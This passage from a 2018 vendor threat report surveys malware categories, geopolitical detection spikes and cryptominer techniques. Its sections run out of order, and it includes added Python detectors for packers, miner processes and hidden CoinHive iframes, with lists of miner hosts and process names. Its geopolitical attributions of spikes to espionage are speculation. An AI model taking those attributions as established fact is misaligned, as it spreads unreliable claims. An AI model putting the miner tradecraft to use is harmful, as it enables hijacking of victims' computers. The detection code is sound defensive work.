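        elif ev.get("EventID") == "4732" and ev.get("Group", "").lower() in admin_groups:
            created_at = created.get((ev["Host"], ev["Member"].lower()))
            if created_at is not None and ev["time"] - created_at <= window:
                alerts.append({
                    "host": ev["Host"],
                    "account": ev["Member"],
                    "group": ev["Group"],
                    "by": ev.get("Subject", "?"),
                    "seconds_between": int((ev["time"] - created_at).total_seconds()),
                })
    return alerts


def detect(text=SAMPLE_LOG):
    """Run the correlation over a log text; returns the list of alerts."""
    return find_new_admin_accounts(parse_log(text))


if __name__ == "__main__":
    for alert in detect():
        print("ALERT new local admin:", alert)
```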

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing, or "packing", it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
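As an added example (not Comodo's code) of how a UPX-style packed executable can be recognised statically, the Python below parses a PE section table and applies three indicators: "UPX*" section names, a first section that is empty on disk but large in memory (the destination the decompression stub unpacks into), and a section whose byte entropy is close to that of compressed data. The PE images are constructed in memory, and the compressed payload is stood in for by seeded pseudo-random bytes; the "renamed" sample shows why the layout and entropy checks still fire when a modified UPX has renamed its sections.

```python
"""Static packer-detection heuristics for the UPX/MUPX case described above.

Added example, not Comodo's code. The three PE images are constructed
in memory (not real binaries); pseudo-random bytes stand in for UCL output.
"""
import math
import random
import struct
from collections import Counter, namedtuple

Section = namedtuple("Section", "name virtual_size raw_size entropy")


def shannon_entropy(buf):
    """Entropy in bits per byte (0.0 .. 8.0); compressed data sits near 8."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def parse_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size            # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        name, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                vsize, raw_size, shannon_entropy(raw)))
    return sections


def assess(data, entropy_threshold=7.0):
    """Return the packing indicators found; two or more => likely packed.
    One high-entropy section (e.g. compressed resources) is common in clean
    files, so a single indicator is never treated as a verdict on its own."""
    secs = parse_sections(data)
    indicators = []
    if any(s.name.upper().startswith("UPX") for s in secs):
        indicators.append("upx_section_names")
    if secs and secs[0].raw_size == 0 and secs[0].virtual_size >= 0x1000:
        # UPX0-style layout: empty on disk, large in memory; survives renaming
        indicators.append("empty_first_section")
    for s in secs:
        if s.raw_size >= 256 and s.entropy > entropy_threshold:
            indicators.append("high_entropy:%s" % s.name)
    return {"sections": [s.name for s in secs], "indicators": indicators,
            "likely_packed": len(indicators) >= 2}


def build_pe(sections):
    """Minimal PE32 image builder for the constructed samples; only the fields
    the parser above reads are meaningful. sections: (name, vsize, raw_bytes)."""
    opt = bytearray(224)                        # zeroed PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)       # Magic = PE32
    hdr_len = 64 + 4 + 20 + len(opt) + 40 * len(sections)
    table, body, raw_ptr, vaddr = bytearray(), bytearray(), hdr_len, 0x1000
    for name, vsize, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        raw_ptr += len(raw)
        vaddr += (vsize + 0xFFF) & ~0xFFF
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)      # e_lfanew: PE header follows DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table) + bytes(body)


_rng = random.Random(2018)
COMPRESSED = bytes(_rng.getrandbits(8) for _ in range(4096))    # stand-in for UCL output
PLAIN_CODE = (b"\x55\x8b\xec\x83\xec\x10" + b"\x90" * 10) * 256  # repetitive, low entropy

# Constructed samples: stock UPX layout, the same layout with benign-looking
# section names (as a modified UPX might produce), and an unpacked file.
SAMPLE_UPX = build_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x2000, COMPRESSED),
                       (b".rsrc", 0x1000, b"\0" * 512)])
SAMPLE_RENAMED = build_pe([(b".text", 0x20000, b""), (b".data", 0x2000, COMPRESSED),
                           (b".rsrc", 0x1000, b"\0" * 512)])
SAMPLE_CLEAN = build_pe([(b".text", 0x1000, PLAIN_CODE), (b".data", 0x1000, b"\0" * 512)])

if __name__ == "__main__":
    for label, sample in (("upx", SAMPLE_UPX), ("renamed", SAMPLE_RENAMED), ("clean", SAMPLE_CLEAN)):
        print(label, assess(sample))
```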

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only a "Potentially Unwanted Application", or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. Such software includes free toolbars, adware, and "system optimizers".

As you can see in the bubble chart, the US was far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3, respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section, let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in the infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Contents

• 1 Executive summary
  • 1.1 Overview
  • 1.2 New trends
    • 1.2.1 Trojans jumped to the top of the malware list
    • 1.2.2 Cryptominers evolved into multifunctional malware
    • 1.2.3 Android malware skyrocketed in variety
    • 1.2.4 Geopolitical intelligence
• 2 Trojans going on the offensive to hunt for confidential data
  • 2.1 The most widespread Trojan
  • 2.2 PowerShell-based attack with Emotet
  • 2.3 Flawed Ammyy RAT attack based on legitimate software
  • 2.4 The growth of Flawed Ammyy attacks for Q2
  • 2.5 Ammyy Admin dissemination around the world for Q2
• 3 Cryptominer evolution: going fileless, killing competitors, crashing systems
  • 3.1 BadShell attacks enterprises
  • 3.2 WinstarNssmMiner: a system killer
  • 3.3 CoinMiner kills rivals
  • 3.4 CoinHive changes its skin
  • 3.5 Cryptocurrency clipboard hijacker intercepts transfers
• 4 Android devices under siege
  • 4.1 Spying, stealing, mining
    • 4.1.1 KevDroid
    • 4.1.2 Zoo Park
    • 4.1.3 MikeSpy
    • 4.1.4 Xloader
    • 4.1.5 Stalker Spy
    • 4.1.6 Mystery Bot
    • 4.1.7 FakeSpy
    • 4.1.8 RedAlert
    • 4.1.9 Hero Rat
    • 4.1.10 Sonvpay
    • 4.1.11 CoinHive
  • 4.2 Android malware catalogued by month
    • 4.2.1 April 2018
    • 4.2.2 May 2018
    • 4.2.3 June 2018
• 5 Malware in Q2 2018: the big picture
  • 5.1 Strategic threat: computer worms
    • 5.1.1 Generic worms
    • 5.1.2 Net worms
    • 5.1.3 Email worms
    • 5.1.4 P2P worms
    • 5.1.5 IM worms
  • 5.2 High-threat malware
    • 5.2.1 Backdoors
    • 5.2.2 Viruses
    • 5.2.3 Trojans
    • 5.2.4 Exploits
  • 5.3 Medium-threat malware
    • 5.3.1 Constructor
    • 5.3.2 Packers
    • 5.3.3 Email flooder
    • 5.3.4 Virtual tools
    • 5.3.5 Jokes
  • 5.4 Low-threat malware: applications
    • 5.4.1 Applications
    • 5.4.2 Unwanted applications
    • 5.4.3 Unsafe applications
• 6 Vertical analysis
• 7 Geopolitical intelligence
  • 7.1 USA
  • 7.2 China
  • 7.3 South Korea
  • 7.4 North Korea
  • 7.5 Armenia
  • 7.6 Belarus
  • 7.7 Iraq
  • 7.8 Ukraine
  • 7.9 Croatia
  • 7.10 Finland, Russia, USA
• 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 19 of 73

This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but the company's financial losses were, of course, irreversible.

Evading antivirus software and persisting on the system are the most important attributes of a cryptominer, because the longer it runs on an infected system, the more it earns for the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus products.

Below is another cunning technique that turns an infected machine into the attacker's slave.

3.2 WinstarNssmMiner: a system killer

Like other cryptominers, WinstarNssmMiner is built to steal computer resources in order to mine cryptocurrency for cybercriminals. But it has a special feature: it embeds itself in the system so deeply that it is effectively unremovable by ordinary means. An attempt to kill it kills the target system along with it.

The secret of WinstarNssmMiner's persistence lies in the way it infects a victim's computer. It consists of two components injected into two svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially notable is that both infected svchost.exe processes carry the "critical process" attribute (the flag set with RtlSetProcessIsCritical, or NtSetInformationProcess with the ProcessBreakOnTermination class), so terminating either of them triggers a bugcheck and leaves the user with a blue screen. A responder should therefore not simply kill the processes: clear the flag first (the same API resets it, given SeDebugPrivilege), or remove the persistence mechanism and reboot, rather than terminating a flagged process.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only their victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out among other cryptominers with a "kill list" feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads the CoinMiner build matching the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of a process named "AMDDriver64".


The code downloads CoinMiner and checks whether a miner is already running

The malware maintains two lists, named $malwares and $malwares2, of the process names it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner takes sole possession of the victim's computer and uses its resources for mining cryptocurrency.
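Both behaviours above leave marks in a process listing: WinstarNssmMiner's workers are svchost.exe instances carrying the critical-process flag, and CoinMiner announces itself through the process name it checks for (AMDDriver64). The following is an added example written for this edit, not Comodo's code or anything taken from the samples. `triage()` applies generic heuristics to a snapshot (the snapshot in the block is constructed; on a real host the parent, path and CPU fields would come from psutil or `Get-CimInstance Win32_Process`), and `is_critical()` reads the ProcessBreakOnTermination flag through ctypes on Windows. The set of processes Windows itself marks critical and the 80% CPU threshold are assumptions to be tuned against a clean baseline.

```python
"""Triage a process snapshot for the cryptominer tradecraft described above.
Added example, not code from the report; see the lead-in for what is assumed."""
import sys
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    name: str          # image name, e.g. "svchost.exe"
    parent: str        # parent's image name
    path: str          # full image path
    critical: bool     # ProcessBreakOnTermination set (see is_critical below)
    cpu_pct: float     # recent CPU share, 0..100


# Processes Windows marks critical itself (assumption: baseline this on a clean host of your build).
OS_CRITICAL = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe", "services.exe", "lsass.exe"}
# The process name CoinMiner tests for before installing itself; compared case-insensitively.
MINER_PROCESS_NAMES = {"amddriver64", "amddriver64.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def triage(snapshot):
    """Return (pid, reason) pairs for processes that match the miner heuristics."""
    findings = []
    for p in snapshot:
        name = p.name.lower()
        if name in MINER_PROCESS_NAMES:
            findings.append((p.pid, f"known miner process name {p.name}"))
        if p.critical and name not in OS_CRITICAL:
            # Terminating this would bugcheck the host: clear the flag first, do not kill.
            findings.append((p.pid, f"critical flag on non-OS process {p.name}: do not terminate"))
        if name == "svchost.exe":
            if p.parent.lower() != "services.exe":
                findings.append((p.pid, f"svchost.exe started by {p.parent}, not services.exe"))
            if not p.path.lower().startswith(SYSTEM_DIRS):
                findings.append((p.pid, f"svchost.exe running from {p.path}"))
            if p.cpu_pct >= 80:
                findings.append((p.pid, f"svchost.exe at {p.cpu_pct:.0f}% CPU"))
    return findings


def is_critical(pid):
    """Windows only: read ProcessBreakOnTermination via NtQueryInformationProcess.
    Returns True/False, or None if the process cannot be opened (usually: not elevated)."""
    if sys.platform != "win32":
        return None
    import ctypes
    from ctypes import wintypes
    PROCESS_QUERY_INFORMATION = 0x0400
    ProcessBreakOnTermination = 29  # PROCESSINFOCLASS value
    k32, ntdll = ctypes.windll.kernel32, ctypes.windll.ntdll
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    if not handle:
        return None
    try:
        flag, returned = wintypes.ULONG(0), wintypes.ULONG(0)
        status = ntdll.NtQueryInformationProcess(handle, ProcessBreakOnTermination,
                                                 ctypes.byref(flag), ctypes.sizeof(flag),
                                                 ctypes.byref(returned))
        return bool(flag.value) if status == 0 else None
    finally:
        k32.CloseHandle(handle)


# Constructed snapshot (not real telemetry) shaped like the infection described above.
SAMPLE_SNAPSHOT = [
    Proc(700, "services.exe", "wininit.exe", r"C:\Windows\System32\services.exe", False, 0.1),
    Proc(900, "svchost.exe", "services.exe", r"C:\Windows\System32\svchost.exe", False, 0.4),
    Proc(4120, "svchost.exe", "explorer.exe", r"C:\Windows\System32\svchost.exe", True, 97.0),  # miner
    Proc(4144, "svchost.exe", "explorer.exe", r"C:\Windows\System32\svchost.exe", True, 1.0),   # AV killer
    Proc(5010, "AMDDriver64.exe", "cmd.exe", r"C:\Users\user\AppData\Local\Temp\AMDDriver64.exe", False, 60.0),
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_SNAPSHOT):
        print(pid, reason)
```

A hit on the critical flag means "do not kill": clear the flag first (NtSetInformationProcess with the same class and a value of 0, which needs SeDebugPrivilege), or remove the persistence and reboot. The parent-process and image-path rules are generic svchost.exe hygiene checks and will also fire on unrelated malware that borrows the name.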


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into a web page, every visitor to the site mines coins for you.

As you can see, the plain CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way around this obstacle: they now camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a web page

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener. Notice that the width and height of the iframe are both set to 1, to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co:

And there we find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's source but finds no sign of a cryptominer. So she concludes that something is wrong with her PC, while CoinHive goes on using her computer to mine cryptocoins. The practical check is to decode every encoded string the page writes into the DOM and inspect what it produces, rather than searching the raw source for the CoinHive script.
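A scanner that performs that decode step, as an added example for this edit (not code from the report): it parses a page, flags script tags and iframes whose host is a CoinHive domain (coinhive.com, coin-hive.com, authedmine.com and the cnhv.co shortlink service) and the inline CoinHive.Anonymous() call, then decodes any long base64 or percent-encoded string literal (the atob()/unescape() idiom) and scans the result the same way, marking 1x1 or CSS-hidden iframes. The three sample pages are constructed for the example; cnhv.co/EXAMPLE is a placeholder, not a real shortlink.

```python
"""Find CoinHive loaders on a page, including the encoded 1x1 iframe to cnhv.co described above.
Added example, not code from the report; sample pages are constructed."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# CoinHive's hostnames; cnhv.co is its shortlink service, which mines for the key owner before redirecting.
MINER_HOSTS = {"coinhive.com", "coin-hive.com", "authedmine.com", "cnhv.co"}
# Quoted literals long enough to be base64 or percent-encoded markup (the atob()/unescape() idiom).
ENCODED_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/=%._-]{24,})['"]""")
INLINE_API = re.compile(r"CoinHive\.(Anonymous|User|Token)\s*\(")


class TagCollector(HTMLParser):
    """Collect iframe attributes and external script sources."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])


def _px(value):
    try:
        return float(value.strip().lower().removesuffix("px"))
    except (AttributeError, ValueError):
        return None


def is_hidden(attrs):
    """1x1 (or zero) dimensions, or CSS hiding: the frame exists only to run the miner."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    style = attrs.get("style", "").replace(" ", "").lower()
    return ((w is not None and w <= 1) or (h is not None and h <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _decoded_literals(text):
    """Yield markup hidden in string literals: percent-decoding if '%' is present, else base64."""
    for lit in ENCODED_LITERAL.findall(text):
        if "%" in lit:
            decoded = unquote(lit)
        else:
            try:
                decoded = base64.b64decode(lit, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
        if "<" in decoded:
            yield decoded


def scan_html(text, depth=0):
    """Return findings for a page, recursing (bounded) into decoded string literals."""
    findings = []
    collector = TagCollector()
    collector.feed(text)
    for src in collector.scripts:
        if _host(src) in MINER_HOSTS:
            findings.append({"kind": "script", "host": _host(src), "hidden": False, "encoded": depth > 0})
    for attrs in collector.iframes:
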